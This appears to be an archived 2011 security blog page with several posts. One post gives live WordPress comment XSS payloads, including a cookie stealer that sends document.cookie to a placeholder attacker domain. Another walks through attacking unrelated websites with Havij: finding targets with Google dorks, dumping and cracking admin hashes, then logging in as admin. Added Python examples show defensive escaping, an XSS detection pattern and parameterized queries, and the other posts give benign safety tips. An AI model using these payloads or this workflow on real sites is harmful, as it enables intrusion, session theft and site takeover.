Showing posts with label Security. Show all posts

Sunday, 20 November 2011

XSS Injection Vulnerability in WordPress 3.2.1



Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version, 3.2.1, of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to an XSS injection attack that allows users to inject malicious JavaScript because the comments field is not sanitized. Without discussing much about what this vulnerability could do to your blog, I will jump to how it works and the solution.

How does it work?

Inject one of the codes below into the comment field of the target, or use your brain to make a more powerful injection.
Popup "alert" box:
<script>alert('hungry-hackers.com')</script>
Redirect to www.hungry-hackers.com:
<script>document.location="http://hungry-hackers.com"</script>
Cookie stealer (needs a logging system in place):
<script>document.location="http://your-domain/your stealer.php?cookie=" + document.cookie;document.location="http://the-site-you-are-stealing-from.com"</script>

Solution:

Upgrade to the latest version when available. In the meantime, disable comments or hold comments for moderation, as I did ;)
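As an added defender-side example, not code from the original post or from WordPress, here is a small Python comment pipeline that does what the "hold comments for moderation" advice asks for: it flags comments carrying script tags or inline handlers for the moderation queue, and escapes every comment on output so the two payloads shown above render as plain text. The comment samples and the `render_comment`/`needs_moderation` names are constructed for this example.

```python
import html
import re

# Constructed sample comments; the second and third mirror the payloads shown in the post.
SAMPLE_COMMENTS = [
    "Great write-up, thanks for the heads-up.",
    "<script>alert('hungry-hackers.com')</script>",
    '<script>document.location="http://hungry-hackers.com"</script>',
]

# Active content that has no place in a blog comment: script tags, javascript: URLs,
# inline event handlers. This pattern is only a moderation aid, not the fix itself;
# the fix is the output escaping in render_comment below, which needs no blocklist.
ACTIVE_CONTENT = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def needs_moderation(comment: str) -> bool:
    """Return True when the comment should be held in the moderation queue."""
    return ACTIVE_CONTENT.search(comment) is not None


def render_comment(comment: str) -> str:
    """Escape the comment text before it is placed in the page, so any markup in it
    is displayed as literal characters instead of being parsed by the browser."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def process_comments(comments):
    """Split comments into rendered, publishable HTML and raw comments held for review."""
    published, held = [], []
    for comment in comments:
        (held if needs_moderation(comment) else published).append(comment)
    return [render_comment(c) for c in published], held


if __name__ == "__main__":
    shown, queued = process_comments(SAMPLE_COMMENTS)
    for markup in shown:
        print("published:", markup)
    for comment in queued:
        # Even a held comment is escaped if a moderator ever previews it.
        print("held for moderation:", render_comment(comment))
```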


How to Secure your Facebook Account


In the past few years a lot of social apps have been developed which have changed our lives completely. Nowadays we have two lives: the actual physical life, and a virtual life which we live through these social apps. Facebook has become a major part of this virtual life. Nobody wants anyone else to take control of their life. Since our virtual life is online, we need to take care that it is not hacked by some stupid hacker and used for their own benefit.

According to the Facebook statistics there are more than 750 million active Facebook users. This makes it a very important target for all the hackers. I have no doubt that the developers at Facebook are working 24×7 to make it as secure as possible, but the hackers are also working 24×7 to find a loophole through which they could take control of your account. For our own safety we also need to work a little harder. In my opinion, the best possible way to do this is by learning how to hack Facebook yourself. If you know the loopholes, you will never fall for them.
Now you might be thinking, how can I learn about hacking Facebook? If you ask me, I would say google it and learn it yourself. But I know that nobody has so much time to search for each and every Facebook hack possible. Luckily Rafay Baloch, the author of "A Beginners Guide To Ethical Hacking", has the answer to your question with his newly created "Facebook Hacking Course".

The Facebook Hacking Course is basically a set of videos which will show you the different methods used by hackers to hack Facebook account passwords and how you can protect yourself from getting hacked. It includes each and every possible method that a hacker could use to get your Facebook credentials. Along with each video you get a lab which tells you exactly how to replicate the attack in a safe environment. It also provides bonus techniques with which you could become anonymous on the internet. If you want to become a hacker, this is the first thing you would want to learn. There is also a second bonus with it: you get email support from none other than Rafay himself.
Now before you make your decision, let's hear some words from Rafay: "Friends, if you ask me 'Is Facebook safe?' my answer would be 'Yes. It's safer than your own computer, but remember it is still possible that your Facebook account may get hacked, and that is because all the hacking methods are client based and not server based, which means that the hackers directly attack you and not Facebook. And securing your Facebook account depends on how well you can avoid these attacks.'"
Now I leave it up to you. You may go and take this course, which I would highly recommend, or you may leave it up to the hackers to find and hack your account.

6 Tips to Avoid Facebook Viruses and Spam Messages



Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren't very difficult to detect if you are cautious enough. They appear on your wall in the form of bizarre or eye-catching stories and videos, and once the user has clicked or liked the link, it is already too late. The next step will be getting rid of your Facebook virus, which is a time-consuming process. It's better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.
2. Try to avoid links and videos with catchy words like "funniest ever," "most hilarious video on Facebook," or "you've got to see this." Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.
3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.
4. Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with a title such as "Sexiest video ever" shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus, which has used this approach in the past.
5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.
6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were a few important tips to safeguard your Facebook account, but your job isn't done yet. Once you have detected that a link or post on your Facebook wall is malicious, you should mark it as SPAM so that Facebook support will stop it from spreading further and infecting other users.
If you have ever fallen victim to any such malicious scheme, please share your experience with all the users in the comments so that others don't fall victim to it.

SQL Injection Using Havij


SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities, because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
SQL injection can be done by manual injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.
In this tutorial we will discuss Havij. Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.
  • You can download havij from here.
  • We will use Google dorks to find the vulnerable websites. There is a big list of Google dorks which I will post in my future articles, but for now we will only use the following:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
  • Just search Google using one of the dorks and you will see a lot of vulnerable websites.
  • Open any one of the websites, then put ' after the link and look:
  • If you get the following SQL error, that means the website is vulnerable to a SQL injection attack.
  • Now open Havij and paste the link without the '.
  • Now we have to find the columns of the database.
  • After this you will be able to find the admin id and password, but remember that normally the web server stores the password as an MD5 hash; you have to crack this hash using Havij's MD5 option, or you may read our tutorial on Cracking MD5.
  • After cracking the password, you have to find the admin login page of the website. To do that, use the Havij options.
  • Now you may log in as the admin user and control the website as you want.
  • H@ppy H@cking
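As an added example from the developer's side, not part of the original post and not Havij code, the following Python snippet uses an in-memory SQLite table standing in for one of the article.php?ID= style pages above. It shows why the stray ' produces the SQL error the post relies on when the query is built by string concatenation, and why the same input is harmless when the id is passed as a bound parameter. The table, its rows and the function names are constructed for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database: two articles looked up by numeric id."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO article VALUES (?, ?)",
                    [(1, "First post"), (2, "Second post")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, article_id: str):
    """Query built by string concatenation: the URL parameter becomes part of the SQL
    text, so anything the visitor types is parsed by the database engine."""
    sql = "SELECT title FROM article WHERE id = " + article_id
    return con.execute(sql).fetchall()


def lookup_parameterized(con: sqlite3.Connection, article_id: str):
    """Query with a bound parameter: the value is handed to the engine as data only and
    can never change the structure of the statement."""
    return con.execute("SELECT title FROM article WHERE id = ?", (article_id,)).fetchall()


def probe(fn, con: sqlite3.Connection, value: str):
    """Run fn with the given id and report either the rows or the SQL error text.
    An error on the concatenated path is the symptom the post uses to spot an
    injectable page; the parameterized path simply returns no rows for a bad id."""
    try:
        return "ok", fn(con, value)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    con = make_db()
    for value in ("1", "1'"):
        print(repr(value), "concatenated  ->", probe(lookup_vulnerable, con, value))
        print(repr(value), "parameterized ->", probe(lookup_parameterized, con, value))
```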

How to Secure your Private Folders



Do you have any private stuff that you would like to hide from your friends and relatives? Would you want it to be invisible so that it remains unnoticed by normal users? But there is software which can display all the folders that are present on the disk. So what if you could even password protect your folder? I guess having your private folder password protected as well as invisible should be secure enough. You might think that you need software for that. Well, here is a way to do it without any additional software, and you can show off in front of your friends by making their folders invisible as well as password protected. Here is the step by step procedure to create a password protected folder.

How to create a Password Protected Folder

1. Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.
2. Now in this folder place all the important files, documents or any folders that you want to password protect.
3. Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.
4. Now a new compressed zipped folder gets created next to this folder (ABC) with the same name.
5. Double-click on this compressed zipped folder and you should see your original folder (ABC) here.
6. Now go to the File menu and select the option Add a password.
i.e.: File -> Add a password
Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

1. Now Right-click on this password protected folder and select Properties.
2. At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).
3. In order to unhide this folder go to My Computer -> Tools -> Folder Options. Switch to the View tab, scroll down, and under Hidden files and folders you'll see the following two options:
  • Do not show hidden files and folders
  • Show hidden files and folders
Now select the second option and press OK. The invisible folder becomes visible in its location. To access it you need the password. To make it invisible again, repeat steps 1 through 3, select the first option and click OK. Now the folder becomes invisible once again.
